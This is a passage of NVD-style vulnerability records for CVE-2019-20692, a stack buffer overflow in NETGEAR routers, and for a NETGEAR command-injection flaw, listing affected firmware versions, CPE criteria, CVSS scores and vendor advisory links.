"matchCriteriaId": "74109B25-B64E-4166-A7B0-E3DA87B89161",
"versionEndExcluding": "1.0.0.70",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex3800:-:*:*:*:*:*:*:*",
"matchCriteriaId": "CC5488D9-651C-4BAB-A141-06B816690D42",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "7147AB6A-80B2-4468-BF13-5B7554AA5DA3",
"versionEndExcluding": "1.0.0.30",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "02E7CA7E-E6CA-4BAB-8F40-4731EA523D91",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6100_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "094113E0-3656-4E2A-B9EF-D397296BD07C",
"versionEndExcluding": "1.0.2.24",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6100:-:*:*:*:*:*:*:*",
"matchCriteriaId": "AB84CD03-765C-4D4F-A176-364F8E72A4E7",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6120_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "12C1BB59-1A89-45B9-A1D2-6D8DFEEC2F16",
"versionEndExcluding": "1.0.0.40",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6120:-:*:*:*:*:*:*:*",
"matchCriteriaId": "8C6DFDB6-1D7A-459A-8D30-FD4900ED718B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6130_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "09C02A78-A382-43A0-A20F-D6521F6DD57F",
"versionEndExcluding": "1.0.0.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6130:-:*:*:*:*:*:*:*",
"matchCriteriaId": "305E295C-9C73-4798-A0BE-7973E1EE5EAB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6150_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D74896A7-7EF2-41C9-8A29-59B2EA5ABA5C",
"versionEndExcluding": "1.0.0.42",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6150:v1:*:*:*:*:*:*:*",
"matchCriteriaId": "2CB9BD19-E748-41B9-8873-316FEB83F13D",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex6200_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A81A7574-A2C7-4216-98C6-6790FA705013",
"versionEndExcluding": "1.0.3.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex6200:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3186CC67-B567-4A0C-BD2C-0433716FBD1B",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:ex7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "2F1E93FB-4926-4AF5-BA5F-A4DE4314B45F",
"versionEndExcluding": "1.0.0.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:ex7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "9F45B620-60B8-40F3-A055-181ADD71EFFF",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "5D1A9B6F-89B2-4785-A0E2-3FD322D6A28F",
"versionEndExcluding": "1.0.4.26",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "502055F1-F919-4C91-A3D0-B144027BC690",
"versionEndExcluding": "1.0.4.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "EB86B739-440E-4269-92EC-F7F3058E4406",
"versionEndExcluding": "1.0.1.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4EAD37-164F-4631-8DED-AB9BD41D2429",
"versionEndExcluding": "1.0.2.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4E821B01-31C8-4766-BAAF-D814336617B9",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "08FF0010-66E3-485C-A22B-39E57E738550",
"versionEndExcluding": "1.0.1.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "577AD463-2E99-4D07-BF12-1D40AC88B3FC",
"versionEndExcluding": "1.0.9.28",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "52A6DEB2-3A33-4184-866D-9C8D9DD991C6",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "90805FFE-E59D-43D2-BF1E-D55458CF05BF",
"versionEndExcluding": "1.3.1.44",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "DFE55F4D-E98B-46D3-B870-041141934CD1",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E59E66D2-7E73-45C8-8D3E-FE589CDBECA4",
"versionEndExcluding": "1.0.0.46",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7100lg:-:*:*:*:*:*:*:*",
"matchCriteriaId": "366FA778-3C2A-42AF-9141-DAD7043B406C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7300dst_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "94B3A9D8-A276-41B2-B7BF-7DA58B879A9B",
"versionEndExcluding": "1.0.0.68",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7300dst:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C75148EB-DE6C-4C5C-BF34-4800A66CF11C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "E0C9AB4A-497B-4D5C-93E3-430C3361E24F",
"versionEndExcluding": "1.0.2.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C484840F-AF30-4B5C-821A-4DB9BE407BDB",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "72C46066-B210-44BB-9219-14B2E8CCEF8E",
"versionEndExcluding": "1.0.4.12",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "5B39F095-8FE8-43FD-A866-7B613B495984",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B19B770D-4660-4B12-8B5C-B689DA8CCB64",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F3D6A70D-66AF-4064-9F1B-4358D4B1F016",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8000p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B2DDFF20-B761-4E45-9F16-CE15C82AAB5C",
"versionEndExcluding": "1.3.0.10",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8000p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "F7EF872D-2537-4FEB-8799-499FC9D44339",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "DB84CB9C-DA5C-4D18-9A54-375DD091D932",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8300:-:*:*:*:*:*:*:*",
"matchCriteriaId": "7A9B77E7-7439-48C6-989F-5E22CB4D3044",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r8500_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "4CA2B4B5-ED8D-476F-9F6E-630B43A38E27",
"versionEndExcluding": "1.0.2.122",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r8500:-:*:*:*:*:*:*:*",
"matchCriteriaId": "63500DE4-BDBD-4F86-AB99-7DB084D0B912",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wn2500rp_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "0675F6C4-EB61-4DA3-8473-448E93D5E0A5",
"versionEndExcluding": "1.0.1.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wn2500rp:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "1C4C1B98-9551-4862-AEAC-3D5C313BD275",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wndr3400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "46D1F73B-1AE0-40AE-BED7-CAE3C7EFEE3B",
"versionEndExcluding": "1.0.1.22",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wndr3400:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "1992E44C-122C-41BC-8FDC-5F9EBEE1FB7C",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:wnr3500l_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "1E338A30-C349-41B4-B971-E6D6B0E9AFE4",
"versionEndExcluding": "1.2.0.54",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:wnr3500l:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "C8DE4BFA-41DE-4748-ACC7-14362333A059",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
}
],
"cveTags": [],
"descriptions": [
{
"lang": "en",
"value": "Certain NETGEAR devices are affected by a stack-based buffer overflow by an unauthenticated attacker. This affects D6220 before 1.0.0.44, D6400 before 1.0.0.78, D7000v2 before 1.0.0.51, D8500 before 1.0.3.42, DGN2200v4 before 1.0.0.110, DGND2200Bv4 before 1.0.0.109, EX3700 before 1.0.0.70, EX3800 before 1.0.0.70, EX6000 before 1.0.0.30, EX6100 before 1.0.2.24, EX6120 before 1.0.0.40, EX6130 before 1.0.0.22, EX6150v1 before 1.0.0.42, EX6200 before 1.0.3.88, EX7000 before 1.0.0.66, R6250 before 1.0.4.26, R6300v2 before 1.0.4.28, R6400 before 1.0.1.36, R6400v2 before 1.0.2.52, R6700 before 1.0.1.46, R6900 before 1.0.1.46, R7000 before 1.0.9.28, R6900P before 1.3.1.44, R7000P before 1.3.1.44, R7100LG before 1.0.0.46, R7300DST before 1.0.0.68, R7900 before 1.0.2.10, R8000 before 1.0.4.12, R7900P before 1.3.0.10, R8000P before 1.3.0.10, R8300 before 1.0.2.122, R8500 before 1.0.2.122, WN2500RPv2 before 1.0.1.54, WNDR3400v3 before 1.0.1.22, and WNR3500Lv2 before 1.2.0.54."
},
{
"lang": "es",
"value": "Determinados dispositivos NETGEAR est\u00e1n afectados por un desbordamiento del b\u00fafer en la regi\u00f3n stack de la memoria por parte de un atacante no autenticado. Esto afecta a D6220 versiones anteriores a 1.0.0.44, D6400 versiones anteriores a 1.0.0.78, D7000v2 versiones anteriores a 1.0.0.51, D8500 versiones anteriores a 1.0.3.42, DGN2200v4 versiones anteriores a 1.0.0.110, DGND2200Bv4 versiones anteriores a 1.0.0.109, EX3700 versiones anteriores a 1.0.0.70, EX3800 versiones anteriores a 1.0.0.70, EX6000 versiones anteriores a 1. 0,0,30, EX6100 versiones anteriores a 1.0.2.24, EX6120 versiones anteriores a 1.0.0.40, EX6130 versiones anteriores a 1.0.0.22, EX6150v1 versiones anteriores a 1.0.0.42, EX6200 versiones anteriores a 1.0.3.88, EX7000 versiones anteriores a 1.0.0.66, R6250 versiones anteriores a 1.0.4.26, R6300v2 versiones anteriores a 1.0.4.28, R6400 versiones anteriores a 1. 0.1.36, R6400v2 versiones anteriores a 1.0.2.52, R6700 versiones anteriores a 1.0.1.46, R6900 versiones anteriores a 1.0.1.46, R7000 versiones anteriores a 1.0.9.28, R6900P versiones anteriores a 1.3.1.44, R7000P versiones anteriores a 1.3.1.44, R7100LG versiones anteriores a 1.0.0.46, R7300DST versiones anteriores a 1.0.0.68, R7900 versiones anteriores a 1. 0.2.10, R8000 versiones anteriores a 1.0.4.12, R7900P versiones anteriores a 1.3.0.10, R8000P versiones anteriores a 1.3.0.10, R8300 versiones anteriores a 1.0.2.122, R8500 versiones anteriores a 1.0.2.122, WN2500RPv2 versiones anteriores a 1.0.1.54, WNDR3400v3 versiones anteriores a 1.0.1.22, y WNR3500Lv2 versiones anteriores a 1.2.0.54."
}
],
"id": "CVE-2019-20692",
"lastModified": "2024-11-21T04:39:05.843",
"metrics": {
"cvssMetricV2": [
{
"acInsufInfo": false,
"baseSeverity": "MEDIUM",
"cvssData": {
"accessComplexity": "LOW",
"accessVector": "LOCAL",
"authentication": "NONE",
"availabilityImpact": "PARTIAL",
"baseScore": 4.6,
"confidentialityImpact": "PARTIAL",
"integrityImpact": "PARTIAL",
"vectorString": "AV:L/AC:L/Au:N/C:P/I:P/A:P",
"version": "2.0"
},
"exploitabilityScore": 3.9,
"impactScore": 6.4,
"obtainAllPrivilege": false,
"obtainOtherPrivilege": false,
"obtainUserPrivilege": false,
"source": "nvd@nist.gov",
"type": "Primary",
"userInteractionRequired": false
}
],
"cvssMetricV30": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "LOW",
"baseScore": 6.3,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.0/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L",
"version": "3.0"
},
"exploitabilityScore": 0.8,
"impactScore": 5.5,
"source": "cve@mitre.org",
"type": "Secondary"
}
],
"cvssMetricV31": [
{
"cvssData": {
"attackComplexity": "LOW",
"attackVector": "LOCAL",
"availabilityImpact": "HIGH",
"baseScore": 6.7,
"baseSeverity": "MEDIUM",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "HIGH",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
},
"exploitabilityScore": 0.8,
"impactScore": 5.9,
"source": "nvd@nist.gov",
"type": "Primary"
}
]
},
"published": "2020-04-16T19:15:23.493",
"references": [
{
"source": "cve@mitre.org",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061447/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2014"
},
{
"source": "af854a3a-2127-422b-91ae-364da2661108",
"tags": [
"Vendor Advisory"
],
"url": "https://kb.netgear.com/000061447/Security-Advisory-for-Pre-Authentication-Stack-Overflow-on-Some-Routers-Gateways-and-Extenders-PSV-2017-2014"
}
],
"sourceIdentifier": "cve@mitre.org",
"vulnStatus": "Modified",
"weaknesses": [
{
"description": [
{
"lang": "en",
"value": "CWE-787"
}
],
"source": "nvd@nist.gov",
"type": "Primary"
}
]
}
Vulnerability from fkie_nvd
Published
2021-08-11 00:15
Modified
2024-11-21 06:17
Severity ?
6.3 (Medium) - CVSS:3.1/AV:L/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:L
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
7.2 (High) - CVSS:3.1/AV:N/AC:L/PR:H/UI:N/S:U/C:H/I:H/A:H
Summary
Certain NETGEAR devices are affected by command injection by an authenticated user. This affects R6250 before 1.0.4.36, R6300v2 before 1.0.4.36, R6400 before 1.0.1.50, R6400v2 before 1.0.2.66, R6700v3 before 1.0.2.66, R6700 before 1.0.2.8, R6900 before 1.0.2.8, R7000 before 1.0.9.88, R6900P before 1.3.2.132, R7100LG before 1.0.0.52, R7900 before 1.0.3.10, R8000 before 1.0.4.46, R7900P before 1.4.1.50, R8000P before 1.4.1.50, and RAX80 before 1.0.1.40.
References
Impacted products
| Vendor | Product | Version | |
|---|---|---|---|
| netgear | r6250_firmware | * | |
| netgear | r6250 | - | |
| netgear | r6300_firmware | * | |
| netgear | r6300 | v2 | |
| netgear | r6400_firmware | * | |
| netgear | r6400 | - | |
| netgear | r6400v2_firmware | * | |
| netgear | r6400 | v2 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | v3 | |
| netgear | r6700_firmware | * | |
| netgear | r6700 | - | |
| netgear | r6900_firmware | * | |
| netgear | r6900 | - | |
| netgear | r7000_firmware | * | |
| netgear | r7000 | - | |
| netgear | r6900p_firmware | * | |
| netgear | r6900p | - | |
| netgear | r7100lg_firmware | * | |
| netgear | r7100lg | - | |
| netgear | r7900_firmware | * | |
| netgear | r7900 | - | |
| netgear | r8000_firmware | * | |
| netgear | r8000 | - | |
| netgear | r7900p_firmware | * | |
| netgear | r7900p | - | |
| netgear | r8000p_firmware | * | |
| netgear | r8000p | - | |
| netgear | rax80_firmware | * | |
| netgear | rax80 | - |
{
"configurations": [
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6250_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "C7557B61-37BD-4070-BACC-2D117210CC68",
"versionEndExcluding": "1.0.4.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6250:-:*:*:*:*:*:*:*",
"matchCriteriaId": "321BE843-52C4-4638-A321-439CA7B3A6F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6300_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F20C9CA7-6DC4-4AEA-9A2C-F2CFD97923EE",
"versionEndExcluding": "1.0.4.36",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6300:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "10938043-F7DF-42C3-8C16-F92CAF8E5576",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "27C41AA7-C24A-49C6-98D9-B1CB2173705F",
"versionEndExcluding": "1.0.1.50",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:-:*:*:*:*:*:*:*",
"matchCriteriaId": "3E4CDF6B-3829-44D0-9675-71D7BE83CAA2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6400v2_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "D075FD21-C022-4246-8465-4EF79BADD29C",
"versionEndExcluding": "1.0.2.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6400:v2:*:*:*:*:*:*:*",
"matchCriteriaId": "52AE9AD2-BC8D-477D-A3D3-891AE52FA5F3",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "B98D6EA5-F107-45C6-9312-BEE78B4644A9",
"versionEndExcluding": "1.0.2.66",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:v3:*:*:*:*:*:*:*",
"matchCriteriaId": "5A09A9E8-8C77-4EDB-9483-B3C540EF083A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6700_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "64C3A900-C9B1-4D4A-B62E-810DC705DC47",
"versionEndExcluding": "1.0.2.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6700:-:*:*:*:*:*:*:*",
"matchCriteriaId": "21B27F11-4262-4CE1-8107-B365A7C152F2",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "F7A5B4B9-59B9-44EE-86C7-099F4F94236D",
"versionEndExcluding": "1.0.2.8",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900:-:*:*:*:*:*:*:*",
"matchCriteriaId": "0794BB7C-1BCF-4F08-8EB2-9C3B150C105A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7000_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "A1FA71CB-0E14-4CBE-99BC-FD94FF4E4FBD",
"versionEndExcluding": "1.0.9.88",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r7000:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C9F86FF6-AB32-4E51-856A-DDE790C0A9A6",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r6900p_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "839A9EBE-5F14-4695-8040-7D5607F8E248",
"versionEndExcluding": "1.3.2.132",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
"cpeMatch": [
{
"criteria": "cpe:2.3:h:netgear:r6900p:-:*:*:*:*:*:*:*",
"matchCriteriaId": "C41908FF-AE64-4949-80E3-BEE061B2DA8A",
"vulnerable": false
}
],
"negate": false,
"operator": "OR"
}
],
"operator": "AND"
},
{
"nodes": [
{
"cpeMatch": [
{
"criteria": "cpe:2.3:o:netgear:r7100lg_firmware:*:*:*:*:*:*:*:*",
"matchCriteriaId": "8F363604-1D1A-4FA2-9EE4-B19645DD35B6",
"versionEndExcluding": "1.0.0.52",
"vulnerable": true
}
],
"negate": false,
"operator": "OR"
},
{
